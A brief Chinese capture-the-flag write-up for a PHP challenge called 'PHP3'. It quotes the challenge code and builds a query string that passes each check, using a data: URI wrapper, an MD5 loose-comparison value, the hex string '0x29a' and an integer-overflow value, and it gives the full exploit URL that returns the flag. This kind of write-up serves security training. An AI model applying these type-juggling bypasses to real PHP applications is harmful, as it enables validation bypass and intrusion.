PHP3

根据

if(@file_get_contents($k1)==="Hello World!"){
	    echo '你好啊!<br>';
	    if(md5($k2)>666666*666666)
	    {
	        $k3=$_GET['a3'];
	        $k4=$_GET['a4'];
	        if(intval($k3)<666)
	        {
	            if($k3==666)
	            {
	                echo '加油，就快要成功啦<br>';
	                if($k4>0)
	                {
	                    if(intval($k3+$k4)<666)
	                        echo $flag;

可知需要提交4个变量
分别为

a1

a2

a3

a4

其中a1需要提交的是Hello World!这个字符串

根据这个网站知道了Hello World!的提交方法

http://les1ie.com/2017/12/27/%E7%BE%8E%E4%BA%9A%E6%9F%8F%E7%A7%91%E9%82%80%E8%AF%B7%E8%B5%9B%E9%9A%8F%E7%AC%94/

即/index.php?a1=data:text/plain;base64,SGVsbG8gV29ybGQh

提交

成功

返回去

a2的要求是a2的md5的值要大于666666*666666

因此在网上搜到 1518375 的md5符合（其实刚才的网站里有后边的解法只要把key1 key2 key3 key4 换成a1 a2 a3 a4即可）

即/index.php?a1=data:text/plain;base64,SGVsbG8gV29ybGQh&a2=1518375&a3=0x29a&a4=999999999999999999999999999999999999999999999999996666

得到flag